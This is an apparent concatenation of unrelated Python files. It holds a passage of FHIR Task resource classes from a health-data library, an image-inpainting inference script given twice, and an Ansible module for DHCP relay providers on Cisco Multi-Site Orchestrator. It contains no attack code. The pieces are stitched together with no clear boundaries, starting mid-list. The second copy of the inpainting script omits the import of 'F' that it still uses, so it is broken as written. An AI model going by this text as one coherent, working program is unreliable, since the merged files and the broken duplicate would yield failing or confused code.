'child_variable': 'valueCount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'type'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRange'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTiming'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDuration'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueNarrative'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRatio'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAddress'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContributor'},
] | cardea/fhir/Task.py | from .fhirbase import fhirbase
class Task(fhirbase):
"""
A task to be performed.
Attributes:
resourceType: This is a Task resource
identifier: The business identifier for this task.
definitionUri: A reference to a formal or informal definition of the
task. For example, a protocol, a step within a defined workflow
definition, etc.
definitionReference: A reference to a formal or informal definition of
the task. For example, a protocol, a step within a defined workflow
definition, etc.
basedOn: BasedOn refers to a higher-level authorization that triggered
the creation of the task. It references a "request" resource such as
a ProcedureRequest, MedicationRequest, ProcedureRequest, CarePlan,
etc. which is distinct from the "request" resource the task is seeking
to fulfil. This latter resource is referenced by FocusOn. For
example, based on a ProcedureRequest (= BasedOn), a task is created to
fulfil a procedureRequest ( = FocusOn ) to collect a specimen from a
patient.
groupIdentifier: An identifier that links together multiple tasks and
other requests that were created in the same context.
partOf: Task that this particular task is part of.
status: The current status of the task.
statusReason: An explanation as to why this task is held, failed, was
refused, etc.
businessStatus: Contains business-specific nuances of the business
state.
intent: Indicates the "level" of actionability associated with the
Task. I.e. Is this a proposed task, a planned task, an actionable
task, etc.
priority: Indicates how quickly the Task should be addressed with
respect to other requests.
code: A name or code (or both) briefly describing what the task
involves.
description: A free-text description of what is to be performed.
focus: The request being actioned or the resource being manipulated by
this task.
for: The entity who benefits from the performance of the service
specified in the task (e.g., the patient).
context: The healthcare event (e.g. a patient and healthcare provider
interaction) during which this task was created.
executionPeriod: Identifies the time action was first taken against
the task (start) and/or the time final action was taken against the
task prior to marking it as completed (end).
authoredOn: The date and time this task was created.
lastModified: The date and time of last modification to this task.
requester: The creator of the task.
performerType: The type of participant that can execute the task.
owner: Individual organization or Device currently responsible for
task execution.
reason: A description or code indicating why this task needs to be
performed.
note: Free-text information captured about the task as it progresses.
relevantHistory: Links to Provenance records for past versions of this
Task that identify key state transitions or updates that are likely to
be relevant to a user looking at the current version of the task.
restriction: If the Task.focus is a request resource and the task is
seeking fulfillment (i.e is asking for the request to be actioned),
this element identifies any limitations on what parts of the
referenced request should be actioned.
input: Additional information that may be needed in the execution of
the task.
output: Outputs produced by the Task.
"""
__name__ = 'Task'
def __init__(self, dict_values=None):
self.resourceType = 'Task'
# type: str
# possible values: Task
self.definitionUri = None
# type: str
self.definitionReference = None
# reference to Reference: identifier
self.basedOn = None
# type: list
# reference to Reference: identifier
self.groupIdentifier = None
# reference to Identifier
self.partOf = None
# type: list
# reference to Reference: identifier
self.status = None
# type: str
# possible values: draft, requested, received, accepted,
# rejected, ready, cancelled, in-progress, on-hold, failed, completed,
# entered-in-error
self.statusReason = None
# reference to CodeableConcept
self.businessStatus = None
# reference to CodeableConcept
self.intent = None
# type: str
self.priority = None
# type: str
self.code = None
# reference to CodeableConcept
self.description = None
# type: str
self.focus = None
# reference to Reference: identifier
self._for = None
# reference to Reference: identifier
self.context = None
# reference to Reference: identifier
self.executionPeriod = None
# reference to Period
self.authoredOn = None
# type: str
self.lastModified = None
# type: str
self.requester = None
# reference to Task_Requester
self.performerType = None
# type: list
# reference to CodeableConcept
self.owner = None
# reference to Reference: identifier
self.reason = None
# reference to CodeableConcept
self.note = None
# type: list
# reference to Annotation
self.relevantHistory = None
# type: list
# reference to Reference: identifier
self.restriction = None
# reference to Task_Restriction
self.input = None
# type: list
# reference to Task_Input
self.output = None
# type: list
# reference to Task_Output
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'requested', 'received', 'accepted', 'rejected', 'ready',
'cancelled', 'in-progress', 'on-hold', 'failed', 'completed',
'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, requested, received, accepted, rejected, ready, cancelled,'
'in-progress, on-hold, failed, completed, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'context'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'identifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'performerType'},
{'parent_entity': 'Task_Restriction',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'restriction'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'executionPeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'basedOn'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'focus'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'reason'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'note'},
{'parent_entity': 'Task_Input',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'input'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'relevantHistory'},
{'parent_entity': 'Task_Requester',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'requester'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'definitionReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'code'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'owner'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'statusReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'groupIdentifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'partOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': '_for'},
{'parent_entity': 'Task_Output',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'output'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'businessStatus'},
]
class Task_Requester(fhirbase):
    """
    A task to be performed.

    Identifies who asked for the task to be done (``agent``) and, where
    applicable, the organization they were acting for (``onBehalfOf``).
    """

    __name__ = 'Task_Requester'

    def __init__(self, dict_values=None):
        self.agent = None  # Reference (by identifier) to the initiator
        self.onBehalfOf = None  # Reference (by identifier) to the organization
        self.object_id = None  # unique identifier for this object instance

        if dict_values:
            self.set_attributes(dict_values)

    def get_relationships(self):
        """Return descriptors linking this entity to referenced resources."""
        return [
            {'parent_entity': 'Reference',
             'parent_variable': 'identifier',
             'child_entity': 'Task_Requester',
             'child_variable': child}
            for child in ('onBehalfOf', 'agent')
        ]
class Task_Restriction(fhirbase):
    """
    A task to be performed.

    Constrains how a request referenced by ``Task.focus`` should be
    fulfilled.

    Attributes:
        repetitions: How many times the requested action should occur.
        period: Over what time-period fulfillment is sought.
        recipient: For requests targeted at more than one potential
            recipient/target, for whom fulfillment is sought.
    """

    __name__ = 'Task_Restriction'

    def __init__(self, dict_values=None):
        self.repetitions = None  # int
        self.period = None  # reference to Period
        self.recipient = None  # list of Reference (by identifier)
        self.object_id = None  # unique identifier for this object instance

        if dict_values:
            self.set_attributes(dict_values)

    def get_relationships(self):
        """Return descriptors linking this entity to referenced resources."""
        links = (('Period', 'object_id', 'period'),
                 ('Reference', 'identifier', 'recipient'))
        return [
            {'parent_entity': parent,
             'parent_variable': join_key,
             'child_entity': 'Task_Restriction',
             'child_variable': child}
            for parent, join_key, child in links
        ]
class Task_Input(fhirbase):
    """
    A task to be performed.

    Represents one input parameter supplied to the task.  ``type`` describes
    how the input is meant to be used during execution; exactly one of the
    ``value*`` attributes is expected to carry the actual value, mirroring
    the FHIR ``Task.input.value[x]`` choice type.
    """

    __name__ = 'Task_Input'

    # All attributes in FHIR declaration order.  The value* names span every
    # primitive and complex datatype allowed by value[x]; object_id is the
    # unique identifier for this object instance.
    _ATTRIBUTES = (
        'type',
        # primitive value[x] variants
        'valueBoolean', 'valueInteger', 'valueDecimal', 'valueBase64Binary',
        'valueInstant', 'valueString', 'valueUri', 'valueDate',
        'valueDateTime', 'valueTime', 'valueCode', 'valueOid', 'valueUuid',
        'valueId', 'valueUnsignedInt', 'valuePositiveInt', 'valueMarkdown',
        # complex value[x] variants
        'valueElement', 'valueExtension', 'valueBackboneElement',
        'valueNarrative', 'valueAnnotation', 'valueAttachment',
        'valueIdentifier', 'valueCodeableConcept', 'valueCoding',
        'valueQuantity', 'valueDuration', 'valueSimpleQuantity',
        'valueDistance', 'valueCount', 'valueMoney', 'valueAge',
        'valueRange', 'valuePeriod', 'valueRatio', 'valueReference',
        'valueSampledData', 'valueSignature', 'valueHumanName',
        'valueAddress', 'valueContactPoint', 'valueTiming', 'valueMeta',
        'valueElementDefinition', 'valueContactDetail', 'valueContributor',
        'valueDosage', 'valueRelatedArtifact', 'valueUsageContext',
        'valueDataRequirement', 'valueParameterDefinition',
        'valueTriggerDefinition',
        'object_id',
    )

    # (referenced entity, attribute) for every complex-typed attribute, in
    # the order the relationship descriptors are reported.
    _RELATIONSHIPS = (
        ('CodeableConcept', 'valueCodeableConcept'),
        ('ContactDetail', 'valueContactDetail'),
        ('Contributor', 'valueContributor'),
        ('RelatedArtifact', 'valueRelatedArtifact'),
        ('Identifier', 'valueIdentifier'),
        ('Attachment', 'valueAttachment'),
        ('Meta', 'valueMeta'),
        ('Quantity', 'valueSimpleQuantity'),
        ('Extension', 'valueExtension'),
        ('Address', 'valueAddress'),
        ('Period', 'valuePeriod'),
        ('DataRequirement', 'valueDataRequirement'),
        ('Quantity', 'valueQuantity'),
        ('Reference', 'valueReference'),
        ('TriggerDefinition', 'valueTriggerDefinition'),
        ('Duration', 'valueDuration'),
        ('ElementDefinition', 'valueElementDefinition'),
        ('Money', 'valueMoney'),
        ('Range', 'valueRange'),
        ('Signature', 'valueSignature'),
        ('UsageContext', 'valueUsageContext'),
        ('Coding', 'valueCoding'),
        ('Dosage', 'valueDosage'),
        ('Narrative', 'valueNarrative'),
        ('Element', 'valueElement'),
        ('Annotation', 'valueAnnotation'),
        ('CodeableConcept', 'type'),
        ('Count', 'valueCount'),
        ('Ratio', 'valueRatio'),
        ('Distance', 'valueDistance'),
        ('BackboneElement', 'valueBackboneElement'),
        ('ContactPoint', 'valueContactPoint'),
        ('Age', 'valueAge'),
        ('Timing', 'valueTiming'),
        ('ParameterDefinition', 'valueParameterDefinition'),
        ('HumanName', 'valueHumanName'),
        ('SampledData', 'valueSampledData'),
    )

    def __init__(self, dict_values=None):
        # Every attribute starts unset; set_attributes (from fhirbase)
        # populates whichever keys are present in dict_values.
        for attribute in self._ATTRIBUTES:
            setattr(self, attribute, None)

        if dict_values:
            self.set_attributes(dict_values)

    def get_relationships(self):
        """Return parent/child descriptors for every complex-typed value."""
        # Reference rows join on 'identifier', Element rows on 'id'; every
        # other datatype joins on its generic 'object_id'.
        join_key = {'Reference': 'identifier', 'Element': 'id'}
        return [
            {'parent_entity': parent,
             'parent_variable': join_key.get(parent, 'object_id'),
             'child_entity': 'Task_Input',
             'child_variable': child}
            for parent, child in self._RELATIONSHIPS
        ]
class Task_Output(fhirbase):
    """
    A task to be performed.

    Represents one output produced by the task.  ``type`` names the output
    parameter; exactly one of the ``value*`` attributes is expected to carry
    the actual value, mirroring the FHIR ``Task.output.value[x]`` choice
    type.
    """

    __name__ = 'Task_Output'

    # All attributes in FHIR declaration order.  The value* names span every
    # primitive and complex datatype allowed by value[x]; object_id is the
    # unique identifier for this object instance.
    _ATTRIBUTES = (
        'type',
        # primitive value[x] variants
        'valueBoolean', 'valueInteger', 'valueDecimal', 'valueBase64Binary',
        'valueInstant', 'valueString', 'valueUri', 'valueDate',
        'valueDateTime', 'valueTime', 'valueCode', 'valueOid', 'valueUuid',
        'valueId', 'valueUnsignedInt', 'valuePositiveInt', 'valueMarkdown',
        # complex value[x] variants
        'valueElement', 'valueExtension', 'valueBackboneElement',
        'valueNarrative', 'valueAnnotation', 'valueAttachment',
        'valueIdentifier', 'valueCodeableConcept', 'valueCoding',
        'valueQuantity', 'valueDuration', 'valueSimpleQuantity',
        'valueDistance', 'valueCount', 'valueMoney', 'valueAge',
        'valueRange', 'valuePeriod', 'valueRatio', 'valueReference',
        'valueSampledData', 'valueSignature', 'valueHumanName',
        'valueAddress', 'valueContactPoint', 'valueTiming', 'valueMeta',
        'valueElementDefinition', 'valueContactDetail', 'valueContributor',
        'valueDosage', 'valueRelatedArtifact', 'valueUsageContext',
        'valueDataRequirement', 'valueParameterDefinition',
        'valueTriggerDefinition',
        'object_id',
    )

    # (referenced entity, attribute) for every complex-typed attribute, in
    # the order the relationship descriptors are reported.
    _RELATIONSHIPS = (
        ('Signature', 'valueSignature'),
        ('Reference', 'valueReference'),
        ('BackboneElement', 'valueBackboneElement'),
        ('RelatedArtifact', 'valueRelatedArtifact'),
        ('Quantity', 'valueSimpleQuantity'),
        ('ContactPoint', 'valueContactPoint'),
        ('Extension', 'valueExtension'),
        ('Age', 'valueAge'),
        ('Meta', 'valueMeta'),
        ('Dosage', 'valueDosage'),
        ('TriggerDefinition', 'valueTriggerDefinition'),
        ('Distance', 'valueDistance'),
        ('Coding', 'valueCoding'),
        ('CodeableConcept', 'valueCodeableConcept'),
        ('ElementDefinition', 'valueElementDefinition'),
        ('Period', 'valuePeriod'),
        ('Identifier', 'valueIdentifier'),
        ('DataRequirement', 'valueDataRequirement'),
        ('SampledData', 'valueSampledData'),
        ('Element', 'valueElement'),
        ('HumanName', 'valueHumanName'),
        ('Money', 'valueMoney'),
        ('Quantity', 'valueQuantity'),
        ('ContactDetail', 'valueContactDetail'),
        ('Attachment', 'valueAttachment'),
        ('Count', 'valueCount'),
        ('CodeableConcept', 'type'),
        ('Range', 'valueRange'),
        ('Timing', 'valueTiming'),
        ('Duration', 'valueDuration'),
        ('Narrative', 'valueNarrative'),
        ('ParameterDefinition', 'valueParameterDefinition'),
        ('Annotation', 'valueAnnotation'),
        ('Ratio', 'valueRatio'),
        ('UsageContext', 'valueUsageContext'),
        ('Address', 'valueAddress'),
        ('Contributor', 'valueContributor'),
    )

    def __init__(self, dict_values=None):
        # Every attribute starts unset; set_attributes (from fhirbase)
        # populates whichever keys are present in dict_values.
        for attribute in self._ATTRIBUTES:
            setattr(self, attribute, None)

        if dict_values:
            self.set_attributes(dict_values)

    def get_relationships(self):
        """Return parent/child descriptors for every complex-typed value."""
        # Reference rows join on 'identifier', Element rows on 'id'; every
        # other datatype joins on its generic 'object_id'.
        join_key = {'Reference': 'identifier', 'Element': 'id'}
        return [
            {'parent_entity': parent,
             'parent_variable': join_key.get(parent, 'object_id'),
             'child_entity': 'Task_Output',
             'child_variable': child}
            for parent, child in self._RELATIONSHIPS
        ]
import torch.nn.functional as F
import torch
import torchvision
from util.unnormalise import UnNormalize
import numpy as np
from PIL import Image
from util.params import Opion
import os
# Undoes the Normalize(mean=0.5, std=0.5) transform applied upstream, so
# tensors can be converted back to displayable pixel values.
unnorm = UnNormalize(mean=[0.5] * 3, std=[0.5] * 3)
# Global options object; supplies dataroot for the reference image below.
opt = Opion()
def img2photo(imgs):
    """Convert a batch of [-1, 1] NCHW tensors to rounded [0, 255] NHWC
    numpy arrays suitable for saving as images."""
    scaled = (imgs + 1) * 127.5
    nhwc = scaled.transpose(1, 2).transpose(2, 3)
    return nhwc.detach().cpu().numpy().round()
# Opened once at import time so saved JPEGs can reuse this image's ICC
# colour profile.  NOTE(review): assumes opt.dataroot contains '001.jpg' —
# confirm for other datasets.
input_image = Image.open(os.path.join(opt.dataroot,'001.jpg'))
def save_jpg(image, image_name, target_dir='pred'):
    """Write an image tensor in [-1, 1] to ``<target_dir>/<image_name>.jpg``.

    The tensor is converted to an HWC uint8 array and saved at maximum JPEG
    quality.  NOTE(review): the ICC profile is copied from the module-level
    ``input_image`` — presumably so outputs match the dataset's colour
    space; confirm that assumption holds for other datasets.
    """
    pixels = img2photo(image)
    pil_image = Image.fromarray(pixels[0].astype(np.uint8))
    destination = os.path.join(target_dir, "{}.jpg".format(image_name))
    pil_image.save(destination, format='JPEG', quality=100,
                   icc_profile=input_image.info.get('icc_profile', ''))
def generate_images(model, dataloader, pred_dir='pred/'):
    """Run the inpainting model over *dataloader* and save composited JPEGs.

    For each (image, mask) pair the inputs are shrunk to a 512x512 square,
    inpainted by *model*, blended with the input outside the mask, resized
    back to the original resolution, un-normalised and written to
    *pred_dir* as ``<401 + idx>.jpg``.

    Args:
        model: inpainting model exposing set_input / set_gt_latent / test /
            get_current_visuals (project-specific interface).
        dataloader: yields (image, mask) batches; shapes assumed to be
            (1, C, H, W) — TODO confirm against caller.
        pred_dir: directory the predicted JPEGs are written to.
    """
    # Loop invariants hoisted out of the per-batch loop.
    align_corners = True
    img_size = 512  # square working resolution fed to the model

    for idx, (ori_image, ori_mask) in enumerate(dataloader):
        # Shrink image and mask to the model's working size.
        image = F.interpolate(ori_image, img_size, mode='bicubic',
                              align_corners=align_corners)
        mask = F.interpolate(ori_mask, img_size, mode='bicubic',
                             align_corners=align_corners)
        image = image.clamp(min=-1, max=1)
        image = image.cuda()
        mask = mask.cuda()
        # Reduce the mask to a single-channel (1, 1, H, W) byte tensor for
        # blending and for the model input.
        mask = mask[0][0]
        mask = torch.unsqueeze(mask, 0)
        mask = torch.unsqueeze(mask, 1)
        mask = mask.byte()

        model.set_input(image, mask)
        model.set_gt_latent()
        model.test()

        ori_image = ori_image.cuda()
        ori_mask = ori_mask.cuda()
        ori_height, ori_width = ori_image.shape[2], ori_image.shape[3]

        # Compose model output inside the mask with the resized input
        # outside it, then upsample back to the original resolution.
        fake_B = model.get_current_visuals(fake=True)
        fake_img = fake_B * mask + image * (1 - mask)
        new_img = F.interpolate(fake_img, (ori_height, ori_width),
                                mode='bicubic', align_corners=align_corners)
        new_img = new_img.clamp(min=-1, max=1)
        # Re-insert untouched original pixels outside the mask; the
        # upsampled result is only trusted inside the hole.
        new_img = ori_image * (1 - ori_mask) + new_img * ori_mask
        new_img = unnorm(new_img)
        # Fix: honour the pred_dir parameter — it was previously ignored
        # and save_jpg always wrote to its own default directory.
        save_jpg(new_img, image_name=401 + idx, target_dir=pred_dir)
import torch
import torchvision
from util.unnormalise import UnNormalize
import numpy as np
from PIL import Image
from util.params import Opion
import os
# Undoes the Normalize(mean=0.5, std=0.5) transform applied upstream, so
# tensors can be converted back to displayable pixel values.
unnorm = UnNormalize(mean=[0.5] * 3, std=[0.5] * 3)
# Global options object; supplies dataroot for the reference image below.
opt = Opion()
def img2photo(imgs):
    """Convert a batch of [-1, 1] NCHW tensors to rounded [0, 255] NHWC
    numpy arrays suitable for saving as images."""
    scaled = (imgs + 1) * 127.5
    nhwc = scaled.transpose(1, 2).transpose(2, 3)
    return nhwc.detach().cpu().numpy().round()
# Opened once at import time so saved JPEGs can reuse this image's ICC
# colour profile.  NOTE(review): assumes opt.dataroot contains '001.jpg' —
# confirm for other datasets.
input_image = Image.open(os.path.join(opt.dataroot,'001.jpg'))
def save_jpg(image, image_name, target_dir='pred'):
    """Write an image tensor in [-1, 1] to ``<target_dir>/<image_name>.jpg``.

    The tensor is converted to an HWC uint8 array and saved at maximum JPEG
    quality.  NOTE(review): the ICC profile is copied from the module-level
    ``input_image`` — presumably so outputs match the dataset's colour
    space; confirm that assumption holds for other datasets.
    """
    pixels = img2photo(image)
    pil_image = Image.fromarray(pixels[0].astype(np.uint8))
    destination = os.path.join(target_dir, "{}.jpg".format(image_name))
    pil_image.save(destination, format='JPEG', quality=100,
                   icc_profile=input_image.info.get('icc_profile', ''))
def generate_images(model, dataloader, pred_dir='pred/'):
    """Run inpainting inference over *dataloader* and save composited JPEGs.

    Each (image, mask) pair is resized to a fixed square, fed through
    *model*, and the generated region is pasted back into the original
    resolution image before saving.

    Args:
        model: inpainting model exposing set_input/set_gt_latent/test/
            get_current_visuals (project-specific; assumed CUDA-capable).
        dataloader: yields (ori_image, ori_mask) batch tensors in [-1, 1].
        pred_dir: directory the JPEG files are written to.
    """
    # model.eval()
    # print("generating images")
    align_corners = True  # loop-invariant: hoisted out of the loop
    img_size = 512        # square network input resolution
    for idx, (ori_image, ori_mask) in enumerate(dataloader):
        # Shrink the original image and mask to the square network input.
        image = F.interpolate(ori_image, img_size, mode='bicubic', align_corners=align_corners)
        mask = F.interpolate(ori_mask, img_size, mode='bicubic', align_corners=align_corners)
        image = image.clamp(min=-1, max=1).cuda()
        # Bicubic resampling smears the binary mask; take the first channel of
        # the first sample, restore a (1, 1, H, W) layout and re-binarize.
        mask = torch.unsqueeze(torch.unsqueeze(mask.cuda()[0][0], 0), 1).byte()
        model.set_input(image, mask)
        model.set_gt_latent()
        model.test()
        ori_image = ori_image.cuda()
        ori_mask = ori_mask.cuda()
        ori_height, ori_width = ori_image.shape[2], ori_image.shape[3]
        fake_B = model.get_current_visuals(fake=True)
        # Keep generated pixels only inside the hole, originals elsewhere.
        fake_img = fake_B * mask + image * (1 - mask)
        # Upscale back to the original resolution.
        new_img = F.interpolate(fake_img, (ori_height, ori_width), mode='bicubic', align_corners=align_corners)
        new_img = new_img.clamp(min=-1, max=1)
        # Re-composite at full resolution so un-masked pixels stay lossless.
        new_img = ori_image * (1 - ori_mask) + new_img * ori_mask
        new_img = unnorm(new_img)
        # Bug fix: pred_dir was previously ignored (save_jpg always wrote to
        # its own default directory); forward it explicitly.
        save_jpg(new_img, image_name=401 + idx, target_dir=pred_dir)
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: mso_dhcp_relay_policy_provider
short_description: Manage DHCP providers in a DHCP Relay policy.
description:
- Manage DHCP providers in a DHCP Relay policy on Cisco Multi-Site Orchestrator.
author:
- <NAME> (@jorgegome2307)
options:
dhcp_relay_policy:
description:
- Name of the DHCP Relay Policy
type: str
required: yes
aliases: [ name ]
ip:
description:
- IP address of the DHCP Server
type: str
tenant:
description:
- Tenant where the DHCP provider is located.
type: str
schema:
description:
- Schema where the DHCP provider is configured
type: str
template:
description:
- template where the DHCP provider is configured
type: str
application_profile:
description:
- Application Profile where the DHCP provider is configured
type: str
aliases: [ anp ]
endpoint_group:
description:
- EPG where the DHCP provider is configured
type: str
aliases: [ epg ]
external_endpoint_group:
description:
- External EPG where the DHCP provider is configured
type: str
aliases: [ ext_epg, external_epg ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: cisco.mso.modules
"""
EXAMPLES = r"""
- name: Add a new provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: present
delegate_to: localhost
- name: Remove a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: absent
delegate_to: localhost
- name: Query a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: query
delegate_to: localhost
- name: Query all provider of a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
state: query
delegate_to: localhost
"""
RETURN = r"""
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.mso.plugins.module_utils.mso import (
MSOModule,
mso_argument_spec,
)
def main():
    """Ansible entry point: add/remove/query one DHCP provider entry inside an
    MSO DHCP Relay policy by PUT-ing the whole, modified policy object back."""
    argument_spec = mso_argument_spec()
    argument_spec.update(
        dhcp_relay_policy=dict(type="str", required=True, aliases=['name']),
        ip=dict(type="str"),
        tenant=dict(type="str"),
        schema=dict(type="str"),
        template=dict(type="str"),
        application_profile=dict(type="str", aliases=['anp']),
        endpoint_group=dict(type="str", aliases=['epg']),
        external_endpoint_group=dict(type="str", aliases=['ext_epg', 'external_epg']),
        state=dict(type="str", default="present", choices=["absent", "present", "query"]),
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        # ip is only required when creating; removal just has to locate the entry.
        required_if=[
            ["state", "present", ["ip", "tenant", "schema", "template"]],
            ["state", "absent", ["tenant", "schema", "template"]],
        ],
    )
    dhcp_relay_policy = module.params.get("dhcp_relay_policy")
    ip = module.params.get("ip")
    tenant = module.params.get("tenant")
    schema = module.params.get("schema")
    template = module.params.get("template")
    if template is not None:
        # MSO reference paths embed the template name without spaces.
        template = template.replace(' ', '')
    application_profile = module.params.get("application_profile")
    endpoint_group = module.params.get("endpoint_group")
    external_endpoint_group = module.params.get("external_endpoint_group")
    state = module.params.get("state")
    mso = MSOModule(module)
    path = "policies/dhcp/relay"
    tenant_id = mso.lookup_tenant(tenant)
    schema_id = mso.lookup_schema(schema)
    # Provider payload skeleton; exactly one of epgRef/externalEpgRef is filled below.
    provider = dict(
        addr=ip,
        externalEpgRef='',
        epgRef='',
        l3Ref='',
        tenantId=tenant_id,
    )
    provider_index = None
    previous_provider = {}
    if application_profile is not None and endpoint_group is not None:
        provider['epgRef'] = '/schemas/{schemaId}/templates/{templateName}/anps/{app}/epgs/{epg}'.format(
            schemaId=schema_id, templateName=template, app=application_profile, epg=endpoint_group,
        )
    elif external_endpoint_group is not None:
        provider['externalEpgRef'] = '/schemas/{schemaId}/templates/{templateName}/externalEpgs/{ext_epg}'.format(
            schemaId=schema_id, templateName=template, ext_epg=external_endpoint_group
        )
    # Query for existing object(s)
    dhcp_relay_obj = mso.get_obj(path, name=dhcp_relay_policy, key="DhcpRelayPolicies")
    if 'id' not in dhcp_relay_obj:
        mso.fail_json(msg="DHCP Relay Policy '{0}' is not a valid DHCP Relay Policy name.".format(dhcp_relay_policy))
    policy_id = dhcp_relay_obj.get("id")
    providers = []
    if "provider" in dhcp_relay_obj:
        providers = dhcp_relay_obj.get('provider')
        # Locate an existing entry pointing at the same EPG / external EPG.
        for index, prov in enumerate(providers):
            if (
                (provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
                or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
            ):
                previous_provider = prov
                provider_index = index
    # If we found an existing object, continue with it
    path = '{0}/{1}'.format(path, policy_id)
    if state == "query":
        mso.existing = providers
        if endpoint_group is not None or external_endpoint_group is not None:
            # A specific provider was requested: return only the match (or {}).
            mso.existing = previous_provider
        mso.exit_json()
    if endpoint_group is None and external_endpoint_group is None:
        mso.fail_json(msg="Missing either endpoint_group or external_endpoint_group required attribute.")
    mso.previous = previous_provider
    if state == "absent":
        provider = {}
        if previous_provider:
            if provider_index is not None:
                providers.pop(provider_index)
    elif state == "present":
        if provider_index is not None:
            # Replace the matching entry in place.
            providers[provider_index] = provider
        else:
            providers.append(provider)
    if module.check_mode:
        # Check mode: report the would-be provider ({} for a removal)
        # without touching the API.
        mso.existing = provider
    else:
        mso.existing = dhcp_relay_obj
        dhcp_relay_obj["provider"] = providers
        mso.sanitize(dhcp_relay_obj, collate=True)
        # The relay-policy API has no per-provider endpoint; PUT the whole policy.
        new_dhcp_relay_obj = mso.request(path, method="PUT", data=mso.sent)
        mso.existing = {}
        # Echo back the provider as stored server-side (stays {} after removal).
        for index, prov in enumerate(new_dhcp_relay_obj.get('provider')):
            if (
                (provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
                or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
            ):
                mso.existing = prov
    mso.exit_json()
